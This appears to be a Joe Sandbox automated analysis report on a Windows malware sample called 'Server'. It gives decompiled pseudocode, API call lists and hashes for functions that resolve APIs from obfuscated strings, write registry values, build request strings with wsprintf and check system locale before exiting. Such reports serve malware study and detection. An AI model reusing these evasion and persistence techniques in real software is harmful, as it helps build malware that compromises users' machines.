            					_t23 =  *0x202a348; // 0xc7d5a8
            					_t1 = _t23 + 0x202b436; // 0x4c44544e
            					_t48 = GetModuleHandleA(_t1);
            					_t26 =  *0x202a348; // 0xc7d5a8
            					_t2 = _t26 + 0x202b85c; // 0x7243775a
            					_v8 = 0x7f;
            					_t28 = GetProcAddress(_t48, _t2);
            					 *(_t54 + 0xc) = _t28;
            					if(_t28 == 0) {
            						L8:
            						E020261DA(_t54);
            					} else {
            						_t30 =  *0x202a348; // 0xc7d5a8
            						_t5 = _t30 + 0x202b849; // 0x614d775a
            						_t32 = GetProcAddress(_t48, _t5);
            						 *(_t54 + 0x10) = _t32;
            						if(_t32 == 0) {
            							goto L8;
            						} else {
            							_t33 =  *0x202a348; // 0xc7d5a8
            							_t7 = _t33 + 0x202b72b; // 0x6e55775a
            							_t35 = GetProcAddress(_t48, _t7);
            							 *(_t54 + 0x14) = _t35;
            							if(_t35 == 0) {
            								goto L8;
            							} else {
            								_t36 =  *0x202a348; // 0xc7d5a8
            								_t9 = _t36 + 0x202b883; // 0x4e6c7452
            								_t38 = GetProcAddress(_t48, _t9);
            								 *(_t54 + 0x18) = _t38;
            								if(_t38 == 0) {
            									goto L8;
            								} else {
            									_t39 =  *0x202a348; // 0xc7d5a8
            									_t11 = _t39 + 0x202b87b; // 0x6c43775a
            									_t41 = GetProcAddress(_t48, _t11);
            									 *(_t54 + 0x1c) = _t41;
            									if(_t41 == 0) {
            										goto L8;
            									} else {
            										 *((intOrPtr*)(_t54 + 4)) = _a4;
            										 *((intOrPtr*)(_t54 + 8)) = 0x40;
            										_t44 = E02027A08(_t54, _a8);
            										_v8 = _t44;
            										if(_t44 != 0) {
            											goto L8;
            										} else {
            											 *_a12 = _t54;
            										}
            									}
            								}
            							}
            						}
            					}
            				}
            				return _v8;
            			}


















            0x02026c08
            0x02026c0c
            0x02026cce
            0x02026c12
            0x02026c12
            0x02026c17
            0x02026c2a
            0x02026c2c
            0x02026c31
            0x02026c39
            0x02026c40
            0x02026c42
            0x02026c47
            0x02026cc6
            0x02026cc7
            0x02026c49
            0x02026c49
            0x02026c4e
            0x02026c56
            0x02026c58
            0x02026c5d
            0x00000000
            0x02026c5f
            0x02026c5f
            0x02026c64
            0x02026c6c
            0x02026c6e
            0x02026c73
            0x00000000
            0x02026c75
            0x02026c75
            0x02026c7a
            0x02026c82
            0x02026c84
            0x02026c89
            0x00000000
            0x02026c8b
            0x02026c8b
            0x02026c90
            0x02026c98
            0x02026c9a
            0x02026c9f
            0x00000000
            0x02026ca1
            0x02026ca7
            0x02026cac
            0x02026cb3
            0x02026cb8
            0x02026cbd
            0x00000000
            0x02026cbf
            0x02026cc2
            0x02026cc2
            0x02026cbd
            0x02026c9f
            0x02026c89
            0x02026c73
            0x02026c5d
            0x02026c47
            0x02026cdc

            APIs
              • Part of subcall function 020233DC: RtlAllocateHeap.NTDLL(00000000,00000000,020262F6), ref: 020233E8
            • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,020237FB,?,?,?,?,00000000,00000000), ref: 02026C1E
            • GetProcAddress.KERNEL32(00000000,7243775A), ref: 02026C40
            • GetProcAddress.KERNEL32(00000000,614D775A), ref: 02026C56
            • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02026C6C
            • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02026C82
            • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02026C98
              • Part of subcall function 02027A08: memset.NTDLL ref: 02027A87
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: AddressProc$AllocateHandleHeapModulememset
            • String ID:
            • API String ID: 1886625739-0
            • Opcode ID: 8aeccbf6013de3d0f901d341bc1cb0249bd28deb3779e4f187bcd44cd0a4d77d
            • Instruction ID: 5f9181a5d9ff932546103d3819e9855e101c87bbbd39fdd42682153e0d0fe231
            • Opcode Fuzzy Hash: 8aeccbf6013de3d0f901d341bc1cb0249bd28deb3779e4f187bcd44cd0a4d77d
            • Instruction Fuzzy Hash: E72124B060071A9FD721EF6ACA84E6A77ECEB043047265827E509C7211EB74D60CDF60
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 88%
            			E02024C94(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
            				signed int _v8;
            				char _v12;
            				signed int* _v16;
            				char _v284;
            				void* __esi;
            				char* _t59;
            				intOrPtr* _t60;
            				intOrPtr _t64;
            				char _t65;
            				intOrPtr _t68;
            				intOrPtr _t69;
            				intOrPtr _t71;
            				void* _t73;
            				signed int _t81;
            				void* _t91;
            				void* _t92;
            				char _t98;
            				signed int* _t100;
            				intOrPtr* _t101;
            				void* _t102;
            
            				_t92 = __ecx;
            				_v8 = _v8 & 0x00000000;
            				_t98 = _a16;
            				if(_t98 == 0) {
            					__imp__( &_v284,  *0x202a3dc);
            					_t91 = 0x80000002;
            					L6:
            					_t59 = E02026536( &_v284,  &_v284);
            					_a8 = _t59;
            					if(_t59 == 0) {
            						_v8 = 8;
            						L29:
            						_t60 = _a20;
            						if(_t60 != 0) {
            							 *_t60 =  *_t60 + 1;
            						}
            						return _v8;
            					}
            					_t101 = _a24;
            					if(E0202313F(_t92, _t97, _t101, _t91, _t59) != 0) {
            						L27:
            						E020261DA(_a8);
            						goto L29;
            					}
            					_t64 =  *0x202a318; // 0x2ca9e18
            					_t16 = _t64 + 0xc; // 0x2ca9f3a
            					_t65 = E02026536(_t64,  *_t16);
            					_a24 = _t65;
            					if(_t65 == 0) {
            						L14:
            						_t29 = _t101 + 0x14; // 0x102
            						_t33 = _t101 + 0x10; // 0x3d020290
            						if(E02027767(_t97,  *_t33, _t91, _a8,  *0x202a3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
            							_t68 =  *0x202a348; // 0xc7d5a8
            							if(_t98 == 0) {
            								_t35 = _t68 + 0x202bb5a; // 0x4d4c4b48
            								_t69 = _t35;
            							} else {
            								_t34 = _t68 + 0x202bbac; // 0x55434b48
            								_t69 = _t34;
            							}
            							if(E02027238(_t69,  *0x202a3d4,  *0x202a3d8,  &_a24,  &_a16) == 0) {
            								if(_t98 == 0) {
            									_t71 =  *0x202a348; // 0xc7d5a8
            									_t44 = _t71 + 0x202b332; // 0x74666f53
            									_t73 = E02026536(_t44, _t44);
            									_t99 = _t73;
            									if(_t73 == 0) {
            										_v8 = 8;
            									} else {
            										_t47 = _t101 + 0x10; // 0x3d020290
            										E02025B0E( *_t47, _t91, _a8,  *0x202a3d8, _a24);
            										_t49 = _t101 + 0x10; // 0x3d020290
            										E02025B0E( *_t49, _t91, _t99,  *0x202a3d0, _a16);
            										E020261DA(_t99);
            									}
            								} else {
            									_t40 = _t101 + 0x10; // 0x3d020290
            									E02025B0E( *_t40, _t91, _a8,  *0x202a3d8, _a24);
            									_t43 = _t101 + 0x10; // 0x3d020290
            									E02025B0E( *_t43, _t91, _a8,  *0x202a3d0, _a16);
            								}
            								if( *_t101 != 0) {
            									E020261DA(_a24);
            								} else {
            									 *_t101 = _a16;
            								}
            							}
            						}
            						goto L27;
            					}
            					_t21 = _t101 + 0x10; // 0x3d020290
            					_t81 = E020258BD( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
            					if(_t81 == 0) {
            						_t100 = _v16;
            						if(_v12 == 0x28) {
            							 *_t100 =  *_t100 & _t81;
            							_t26 = _t101 + 0x10; // 0x3d020290
            							E02027767(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
            						}
            						E020261DA(_t100);
            						_t98 = _a16;
            					}
            					E020261DA(_a24);
            					goto L14;
            				}
            				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
            					goto L29;
            				} else {
            					_t97 = _a8;
            					E02027AB0(_t98, _a8,  &_v284);
            					__imp__(_t102 + _t98 - 0x117,  *0x202a3dc);
            					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
            					_t91 = 0x80000003;
            					goto L6;
            				}
            			}























            0x02024c94
            0x02024c9d
            0x02024ca4
            0x02024ca9
            0x02024d16
            0x02024d1c
            0x02024d21
            0x02024d28
            0x02024d2d
            0x02024d32
            0x02024e9d
            0x02024ea4
            0x02024ea4
            0x02024ea9
            0x02024eab
            0x02024eab
            0x02024eb4
            0x02024eb4
            0x02024d38
            0x02024d44
            0x02024e93
            0x02024e96
            0x00000000
            0x02024e96
            0x02024d4a
            0x02024d4f
            0x02024d52
            0x02024d57
            0x02024d5c
            0x02024da5
            0x02024da5
            0x02024db8
            0x02024dc2
            0x02024dc8
            0x02024dcf
            0x02024dd9
            0x02024dd9
            0x02024dd1
            0x02024dd1
            0x02024dd1
            0x02024dd1
            0x02024dfb
            0x02024e03
            0x02024e31
            0x02024e36
            0x02024e3d
            0x02024e42
            0x02024e46
            0x02024e78
            0x02024e48
            0x02024e55
            0x02024e58
            0x02024e68
            0x02024e6b
            0x02024e71
            0x02024e71
            0x02024e05
            0x02024e12
            0x02024e15
            0x02024e27
            0x02024e2a
            0x02024e2a
            0x02024e82
            0x02024e8e
            0x02024e84
            0x02024e87
            0x02024e87
            0x02024e82
            0x02024dfb
            0x00000000
            0x02024dc2
            0x02024d6b
            0x02024d6e
            0x02024d75
            0x02024d7b
            0x02024d7e
            0x02024d80
            0x02024d8c
            0x02024d8f
            0x02024d8f
            0x02024d95
            0x02024d9a
            0x02024d9a
            0x02024da0
            0x00000000
            0x02024da0
            0x02024cae
            0x00000000
            0x02024cd5
            0x02024cd5
            0x02024ce1
            0x02024cf4
            0x02024cfa
            0x02024d02
            0x00000000
            0x02024d02

            APIs
            • StrChrA.SHLWAPI(02026A76,0000005F,00000000,00000000,00000104), ref: 02024CC7
            • lstrcpy.KERNEL32(?,?), ref: 02024CF4
              • Part of subcall function 02026536: lstrlen.KERNEL32(?,00000000,02CA9E18,00000000,02026F0A,02CAA03B,43175AC3,?,?,?,?,43175AC3,00000005,0202A00C,4D283A53,?), ref: 0202653D
              • Part of subcall function 02026536: mbstowcs.NTDLL ref: 02026566
              • Part of subcall function 02026536: memset.NTDLL ref: 02026578
              • Part of subcall function 02025B0E: lstrlenW.KERNEL32(?,?,?,02024E5D,3D020290,80000002,02026A76,020257D1,74666F53,4D4C4B48,020257D1,?,3D020290,80000002,02026A76,?), ref: 02025B33
              • Part of subcall function 020261DA: RtlFreeHeap.NTDLL(00000000,00000000,02026383,00000000,?,00000000,00000000), ref: 020261E6
            • lstrcpy.KERNEL32(?,00000000), ref: 02024D16
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
            • String ID: ($\
            • API String ID: 3924217599-1512714803
            • Opcode ID: a8a3ae706d721f295665ab9da411c37c95c2accb5c43d5af3894172a1d48fdda
            • Instruction ID: b998d3ce825704ce02e88e9c501026dd9454336c6130302baac990ff2e6b37fd
            • Opcode Fuzzy Hash: a8a3ae706d721f295665ab9da411c37c95c2accb5c43d5af3894172a1d48fdda
            • Instruction Fuzzy Hash: 97513772500329EFDF229F60DD80EEA7BBAFF08354F108916F91196160DB35E929AF10
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 39%
            			E0202454F(void* __eax, void* __ecx) {
            				char _v8;
            				void* _v12;
            				intOrPtr _v16;
            				char _v20;
            				void* __esi;
            				intOrPtr _t36;
            				intOrPtr* _t37;
            				intOrPtr* _t39;
            				void* _t53;
            				long _t58;
            				void* _t59;
            
            				_t53 = __ecx;
            				_t59 = __eax;
            				_t58 = 0;
            				ResetEvent( *(__eax + 0x1c));
            				_push( &_v8);
            				_push(4);
            				_push( &_v20);
            				_push( *((intOrPtr*)(_t59 + 0x18)));
            				if( *0x202a160() != 0) {
            					L5:
            					if(_v8 == 0) {
            						 *((intOrPtr*)(_t59 + 0x30)) = 0;
            						L21:
            						return _t58;
            					}
            					 *0x202a174(0, 1,  &_v12);
            					if(0 != 0) {
            						_t58 = 8;
            						goto L21;
            					}
            					_t36 = E020233DC(0x1000);
            					_v16 = _t36;
            					if(_t36 == 0) {
            						_t58 = 8;
            						L18:
            						_t37 = _v12;
            						 *((intOrPtr*)( *_t37 + 8))(_t37);
            						goto L21;
            					}
            					_push(0);
            					_push(_v8);
            					_push( &_v20);
            					while(1) {
            						_t39 = _v12;
            						_t56 =  *_t39;
            						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
            						ResetEvent( *(_t59 + 0x1c));
            						_push( &_v8);
            						_push(0x1000);
            						_push(_v16);
            						_push( *((intOrPtr*)(_t59 + 0x18)));
            						if( *0x202a160() != 0) {
            							goto L13;
            						}
            						_t58 = GetLastError();
            						if(_t58 != 0x3e5) {
            							L15:
            							E020261DA(_v16);
            							if(_t58 == 0) {
            								_t58 = E02022B18(_v12, _t59);
            							}
            							goto L18;
            						}
            						_t58 = E020216B2( *(_t59 + 0x1c), _t56, 0xffffffff);
            						if(_t58 != 0) {
            							goto L15;
            						}
            						_t58 =  *((intOrPtr*)(_t59 + 0x28));
            						if(_t58 != 0) {
            							goto L15;
            						}
            						L13:
            						_t58 = 0;
            						if(_v8 == 0) {
            							goto L15;
            						}
            						_push(0);
            						_push(_v8);
            						_push(_v16);
            					}
            				}
            				_t58 = GetLastError();
            				if(_t58 != 0x3e5) {
            					L4:
            					if(_t58 != 0) {
            						goto L21;
            					}
            					goto L5;
            				}
            				_t58 = E020216B2( *(_t59 + 0x1c), _t53, 0xffffffff);
            				if(_t58 != 0) {
            					goto L21;
            				}
            				_t58 =  *((intOrPtr*)(_t59 + 0x28));
            				goto L4;
            			}














            0x0202454f
            0x0202455e
            0x02024563
            0x02024565
            0x0202456a
            0x0202456b
            0x02024570
            0x02024571
            0x0202457c
            0x020245ad
            0x020245b2
            0x02024675
            0x02024678
            0x0202467e
            0x0202467e
            0x020245bf
            0x020245c7
            0x02024672
            0x00000000
            0x02024672
            0x020245d2
            0x020245d7
            0x020245dc
            0x02024664
            0x02024665
            0x02024665
            0x0202466b
            0x00000000
            0x0202466b
            0x020245e2
            0x020245e4
            0x020245ea
            0x020245eb
            0x020245eb
            0x020245ee
            0x020245f1
            0x020245f7
            0x020245fc
            0x020245fd
            0x02024602
            0x02024605
            0x02024610
            0x00000000
            0x00000000
            0x02024618
            0x02024620
            0x02024649
            0x0202464c
            0x02024653
            0x0202465e
            0x0202465e
            0x00000000
            0x02024653
            0x0202462c
            0x02024630
            0x00000000
            0x00000000
            0x02024632
            0x02024637
            0x00000000
            0x00000000
            0x02024639
            0x02024639
            0x0202463e
            0x00000000
            0x00000000
            0x02024640
            0x02024641
            0x02024644
            0x02024644
            0x020245eb
            0x02024584
            0x0202458c
            0x020245a5
            0x020245a7
            0x00000000
            0x00000000
            0x00000000
            0x020245a7
            0x02024598
            0x0202459c
            0x00000000
            0x00000000
            0x020245a2
            0x00000000

            APIs
            • ResetEvent.KERNEL32(?), ref: 02024565
            • GetLastError.KERNEL32 ref: 0202457E
              • Part of subcall function 020216B2: WaitForMultipleObjects.KERNEL32(00000002,02027C47,00000000,02027C47,?,?,?,02027C47,0000EA60), ref: 020216CD
            • ResetEvent.KERNEL32(?), ref: 020245F7
            • GetLastError.KERNEL32 ref: 02024612
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: ErrorEventLastReset$MultipleObjectsWait
            • String ID: @MetNet
            • API String ID: 2394032930-2109406137
            • Opcode ID: 6b6730611aaecd0fabfb85fd5b867284cafd78d70e12e17e3e5e4e2d6118b2c9
            • Instruction ID: 672e159261fc1a282202efdd79a4f0b851308ec5417796df357f90bcc1df206c
            • Opcode Fuzzy Hash: 6b6730611aaecd0fabfb85fd5b867284cafd78d70e12e17e3e5e4e2d6118b2c9
            • Instruction Fuzzy Hash: 9E31E632A40724AFCB229BA4CC48F6EB7F9FF84354F210516E555D7190DB30E909EB10
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 37%
            			E0202607C() {
            				void* _v0;
            				void** _t3;
            				void** _t5;
            				void** _t7;
            				void** _t8;
            				void* _t10;
            
            				_t3 =  *0x202a3cc; // 0x2ca9600
            				__imp__( &(_t3[0x10]));
            				while(1) {
            					_t5 =  *0x202a3cc; // 0x2ca9600
            					_t1 =  &(_t5[0x16]); // 0x0
            					if( *_t1 == 0) {
            						break;
            					}
            					Sleep(0xa);
            				}
            				_t7 =  *0x202a3cc; // 0x2ca9600
            				_t10 =  *_t7;
            				if(_t10 != 0 && _t10 != 0x202b142) {
            					HeapFree( *0x202a2d8, 0, _t10);
            					_t7 =  *0x202a3cc; // 0x2ca9600
            				}
            				 *_t7 = _v0;
            				_t8 =  &(_t7[0x10]);
            				__imp__(_t8);
            				return _t8;
            			}









            0x0202607c
            0x02026085
            0x02026095
            0x02026095
            0x0202609a
            0x0202609f
            0x00000000
            0x00000000
            0x0202608f
            0x0202608f
            0x020260a1
            0x020260a6
            0x020260aa
            0x020260bd
            0x020260c3
            0x020260c3
            0x020260cc
            0x020260ce
            0x020260d2
            0x020260d8

            APIs
            • RtlEnterCriticalSection.NTDLL(02CA95C0), ref: 02026085
            • Sleep.KERNEL32(0000000A), ref: 0202608F
            • HeapFree.KERNEL32(00000000), ref: 020260BD
            • RtlLeaveCriticalSection.NTDLL(02CA95C0), ref: 020260D2
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
            • String ID: Uet
            • API String ID: 58946197-2766386878
            • Opcode ID: 6559e2a8c60c8de16957baee83bc6e9687fb97a85defadea5b1a7e1cfe17f291
            • Instruction ID: 80f6d2a843771d640b6f4e0424d6c285eff7d95d9ce1ee78d1ff15eb1c59332b
            • Opcode Fuzzy Hash: 6559e2a8c60c8de16957baee83bc6e9687fb97a85defadea5b1a7e1cfe17f291
            • Instruction Fuzzy Hash: 95F03A74B803159FE7288F54D9C9B1637F5BB44700F264907F806D73A0CB39A82CEA14
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,01FC167F,0000000A,?,?), ref: 01FC1824
            • CreateFileMappingW.KERNEL32(000000FF,00404188,00000004,00000000,?,?,?,?,54D38000,00000192), ref: 01FC1884
            • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,01FC167F,0000000A), ref: 01FC18AF
            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,01FC167F,0000000A,?,?), ref: 01FC18D0
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,01FC167F,0000000A,?,?), ref: 01FC18D8
            Memory Dump Source
            • Source File: 00000000.00000002.513718671.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_1fc0000_Server.jbxd
            Yara matches
            Similarity
            • API ID: File$Time$CloseCreateErrorHandleLastMappingSystemView
            • String ID:
            • API String ID: 2685682793-0
            • Opcode ID: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
            • Instruction ID: 20e0f9426c227fb7bd0d8c8894f6c493cf92afbc8a128dc3c87992a5e0ac4fab
            • Opcode Fuzzy Hash: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
            • Instruction Fuzzy Hash: 8B21F5B2E0810AFFE710EFA8CD84EAF3BADEB44791F104039FA01E7191D63189549B60
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 01FC2052
            • GetModuleHandleA.KERNEL32(00000000), ref: 01FC2062
            • GetCommandLineW.KERNEL32 ref: 01FC206D
              • Part of subcall function 01FC1C58: NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 01FC1C8D
              • Part of subcall function 01FC1C58: Sleep.KERNEL32(00000000,00000030), ref: 01FC1CD4
              • Part of subcall function 01FC1C58: GetLocaleInfoA.KERNEL32(00000400,0000005A,?,00000004), ref: 01FC1CFC
              • Part of subcall function 01FC1C58: GetSystemDefaultUILanguage.KERNEL32 ref: 01FC1D06
              • Part of subcall function 01FC1C58: VerLanguageNameA.KERNEL32(?,?,00000004), ref: 01FC1D19
            • HeapDestroy.KERNEL32 ref: 01FC2080
            • ExitProcess.KERNEL32 ref: 01FC2087
            Memory Dump Source
            • Source File: 00000000.00000002.513718671.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_1fc0000_Server.jbxd
            Yara matches
            Similarity
            • API ID: HeapLanguageSystem$CommandCreateDefaultDestroyExitHandleInfoInformationLineLocaleModuleNameProcessQuerySleep
            • String ID:
            • API String ID: 1393419808-0
            • Opcode ID: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
            • Instruction ID: e042452a08378d25bfe395b94bafe480bafd03bec894fa388cb0b544f1c396ae
            • Opcode Fuzzy Hash: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
            • Instruction Fuzzy Hash: 23E0B6B0803621ABC3216F71BF0CA4E7E28BB59A527000535F605F2125CB394645DA9C
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 85%
            			E020235D2(intOrPtr* __eax, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
            				void* _v8;
            				char _v48;
            				void* __edi;
            				intOrPtr _t22;
            				intOrPtr _t30;
            				intOrPtr _t34;
            				intOrPtr* _t42;
            				void* _t43;
            				void* _t46;
            				intOrPtr* _t48;
            				void* _t49;
            				intOrPtr _t51;
            
            				_t42 = _a16;
            				_t48 = __eax;
            				_t22 =  *0x202a348; // 0xc7d5a8
            				_t2 = _t22 + 0x202b7bb; // 0x657a6973
            				wsprintfA( &_v48, _t2,  *__eax,  *_t42);
            				if( *0x202a2ec >= 5) {
            					_t30 = E02023CE0(_a4, _t43, _t46,  &_v48,  &_v8,  &_a16);
            					L5:
            					_a4 = _t30;
            					L6:
            					if(_a4 != 0) {
            						L9:
            						 *0x202a2ec =  *0x202a2ec + 1;
            						L10:
            						return _a4;
            					}
            					_t50 = _a16;
            					 *_t48 = _a16;
            					_t49 = _v8;
            					 *_t42 = E020256B9(_t50, _t49);
            					_t34 = E020277A5(_t49, _t50);
            					if(_t34 != 0) {
            						 *_a8 = _t49;
            						 *_a12 = _t34;
            						if( *0x202a2ec < 5) {
            							 *0x202a2ec =  *0x202a2ec & 0x00000000;
            						}
            						goto L10;
            					}
            					_a4 = 0xbf;
            					E020263F6();
            					HeapFree( *0x202a2d8, 0, _t49);
            					goto L9;
            				}
            				_t51 =  *0x202a3e0; // 0x2ca9c20
            				if(RtlAllocateHeap( *0x202a2d8, 0, 0x800) == 0) {
            					_a4 = 8;
            					goto L6;
            				}
            				_t30 = E02022B91(_a4, _t51,  &_v48,  &_v8,  &_a16, _t37);
            				goto L5;
            			}















            0x020235d9
            0x020235e0
            0x020235e4
            0x020235e9
            0x020235f4
            0x02023604
            0x02023653
            0x02023658
            0x02023658
            0x0202365b
            0x0202365f
            0x02023699
            0x02023699
            0x0202369f
            0x020236a6
            0x020236a6
            0x02023661
            0x02023664
            0x02023666
            0x02023673
            0x02023675
            0x0202367c
            0x020236b3
            0x020236b8
            0x020236ba
            0x020236bc
            0x020236bc
            0x00000000
            0x020236ba
            0x0202367e
            0x02023685
            0x02023693
            0x00000000
            0x02023693
            0x02023606
            0x02023621
            0x0202363b
            0x00000000
            0x0202363b
            0x02023634
            0x00000000

            APIs
            • wsprintfA.USER32 ref: 020235F4
            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02023619
              • Part of subcall function 02022B91: GetTickCount.KERNEL32 ref: 02022BA8
              • Part of subcall function 02022B91: wsprintfA.USER32 ref: 02022BF5
              • Part of subcall function 02022B91: wsprintfA.USER32 ref: 02022C12
              • Part of subcall function 02022B91: wsprintfA.USER32 ref: 02022C34
              • Part of subcall function 02022B91: wsprintfA.USER32 ref: 02022C5B
              • Part of subcall function 02022B91: wsprintfA.USER32 ref: 02022C7C
              • Part of subcall function 02022B91: wsprintfA.USER32 ref: 02022CA7
              • Part of subcall function 02022B91: HeapFree.KERNEL32(00000000,?), ref: 02022CBA
            • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 02023693
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: wsprintf$Heap$Free$AllocateCountTick
            • String ID: Uet
            • API String ID: 1307794992-2766386878
            • Opcode ID: d71a194a62173cb448627e293c3652cae7a1b5d51d4095bec01e975fdd655608
            • Instruction ID: 2ffd4b3fa76b3c3815243e92686653584105cd33536326e0eae9c3bf512f6779
            • Opcode Fuzzy Hash: d71a194a62173cb448627e293c3652cae7a1b5d51d4095bec01e975fdd655608
            • Instruction Fuzzy Hash: 13312B71A00318AFCB11DFA4D988BDA37BDFB08355F218463E905A7210DB38A55CDFA1
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 46%
            			E02026CDF(intOrPtr* __eax) {
            				void* _v8;
            				WCHAR* _v12;
            				void* _v16;
            				char _v20;
            				void* _v24;
            				intOrPtr _v28;
            				void* _v32;
            				intOrPtr _v40;
            				short _v48;
            				intOrPtr _v56;
            				short _v64;
            				intOrPtr* _t54;
            				intOrPtr* _t56;
            				intOrPtr _t57;
            				intOrPtr* _t58;
            				intOrPtr* _t60;
            				void* _t61;
            				intOrPtr* _t63;
            				intOrPtr* _t65;
            				short _t67;
            				intOrPtr* _t68;
            				intOrPtr* _t70;
            				intOrPtr* _t72;
            				intOrPtr* _t75;
            				intOrPtr* _t77;
            				intOrPtr _t79;
            				intOrPtr* _t83;
            				intOrPtr* _t87;
            				intOrPtr _t103;
            				intOrPtr _t109;
            				void* _t118;
            				void* _t122;
            				void* _t123;
            				intOrPtr _t130;
            
            				_t123 = _t122 - 0x3c;
            				_push( &_v8);
            				_push(__eax);
            				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
            				if(_t118 >= 0) {
            					_t54 = _v8;
            					_t103 =  *0x202a348; // 0xc7d5a8
            					_t5 = _t103 + 0x202b038; // 0x3050f485
            					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
            					_t56 = _v8;
            					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
            					if(_t118 >= 0) {
            						__imp__#2(0x2029284);
            						_v28 = _t57;
            						if(_t57 == 0) {
            							_t118 = 0x8007000e;
            						} else {
            							_t60 = _v32;
